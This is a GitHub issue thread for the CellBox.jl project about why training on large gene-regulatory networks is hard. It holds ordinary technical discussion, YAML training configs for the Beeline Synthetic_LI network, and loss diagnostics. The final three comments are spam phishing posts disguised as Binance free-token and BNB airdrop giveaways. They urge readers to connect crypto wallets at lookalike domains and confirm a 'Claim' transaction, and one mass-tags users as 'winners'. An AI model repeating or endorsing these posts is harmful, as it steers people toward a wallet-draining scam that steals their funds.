### ISSUE TITLE
Training with large system size is hard

### ISSUE THREAD

**Issue by DesmondYuan** [jiweiqi/CellBox.jl#13]
[Essential] system size - data size relationship analysis

- why
  - question is indeed too hard
  - too many/few time points for each trajectory
  - only config level limit, better fine-tuning can help

- solution
  - increase sparsity (less params)
  - add more information (longer ntotal)
  - try different network structure

**Comment by DesmondYuan** [comment]
Adding tests for Beeline networks 
47e8652a3d38d7189fca12b763ab6818f310c586 and a2b0c0b6e0c5b7530cd50c5494afafd5e772b1f2

Pratapa, A., Jalihal, A. P., Law, J. N., Bharadwaj, A. & Murali, T. M. Benchmarking algorithms for gene regulatory network inference from single-cell transcriptomic data. Nat. Methods 17, 147–154 (2020). https://www.nature.com/articles/s41592-019-0690-6


![](https://media.springernature.com/full/springer-static/esm/art%3A10.1038%2Fs41592-019-0690-6/MediaObjects/41592_2019_690_Fig7_ESM.jpg)

**Comment by jiweiqi** [comment]
A good demo for L1
```yaml
network: "beeline_networks/Synthetic_LI.csv"
ns: 7

tfinal: 20.0
ntotal: 20
batch_size: 16
epoch_size: -1

lr: 1.e-3
lr_new: -1  #use -1 otehrwise
weight_decay: 1.e-5

n_mu: 3

n_exp_train: 20
n_exp_val: 5
n_exp_test: 5
noise: 0.01

n_iter_max: 100000
n_plot: 20 # frequency of callback

n_iter_buffer: 5000
n_iter_burnin: 100
n_iter_tol: 10000
convergence_tol: 1e-8

drop_range:
   lb: -0.1
   ub: 0.1

```

**Comment by jiweiqi** [comment]
The program takes about 7 minutes. about 2.1 it/s.
![image](https://user-images.githubusercontent.com/8445647/108400748-99684c00-71e9-11eb-8814-c4286546881b.png)
![image](https://user-images.githubusercontent.com/8445647/108400811-a38a4a80-71e9-11eb-86ec-3a357affeab7.png)

One testing condition
![image](https://user-images.githubusercontent.com/8445647/108400844-ad13b280-71e9-11eb-8477-a2a31d5f3097.png)

**Comment by jiweiqi** [comment]
A simple criterion to judge if the data is sufficient is whether there is a big gap between training loss and validation loss.
If there is, we shall increase the number of conditions.

**Comment by judyueshen** [comment]
Another good training example for LI network, with 10 training conditions and 10 ntotal
```yaml
is_restart: false
network: "beeline_networks/Synthetic_LI.csv"
ns: 7

tfinal: 10.0
ntotal: 10
batch_size: 8
epoch_size: -1

lr: 1.e-3
weight_decay: 1.e-6

n_mu: 3

n_exp_train: 10
n_exp_val: 5
n_exp_test: 5
noise: 0.01

n_iter_max: 10000
n_plot: 20 # frequency of callback

n_iter_buffer: 50
n_iter_burnin: 100
n_iter_tol: 500
convergence_tol: 1e-8

drop_range:
   lb: -0.1
   ub: 0.1
```

![loss_grad](https://user-images.githubusercontent.com/25517964/108538660-0c86c680-72ad-11eb-8326-0a6449cd19a8.png)
![p_inference_iter2645](https://user-images.githubusercontent.com/25517964/108538681-10b2e400-72ad-11eb-9aa0-88bef0257e07.png)
![i_exp_1](https://user-images.githubusercontent.com/25517964/108538694-14466b00-72ad-11eb-96ea-8c158214dc8c.png)

**Comment by DesmondYuan** [comment]
Curated model
![](https://media.springernature.com/full/springer-static/image/art%3A10.1038%2Fs41592-019-0690-6/MediaObjects/41592_2019_690_Fig3_HTML.png)

**Comment by p4u1d34n** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by manoharkumarmahto** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by Renyu106** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🌟 Exciting News! 🎉 You're in for a treat! 🚀 You've just hit the jackpot and secured your spot in the $1.5k Binance Airdrop! 🤑 Brace yourself for an amazing windfall of $1500 in BNB. But that's not all – here's the cherry on top: Connect now, and enjoy an instant bonus of $100! 🚀 Don't miss out on this golden opportunity. Follow the simple steps below to claim your tokens and elevate the joy of this spectacular giveaway! 🌈

[![Claim Now](https://pbs.twimg.com/media/FgeJoNLaMAAqLfx.jpg:large)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @17May, @namwiraedd, @sebastiancichos, @bbardakk, @papsebestyen, @ren3104, @Ganesh-Truth
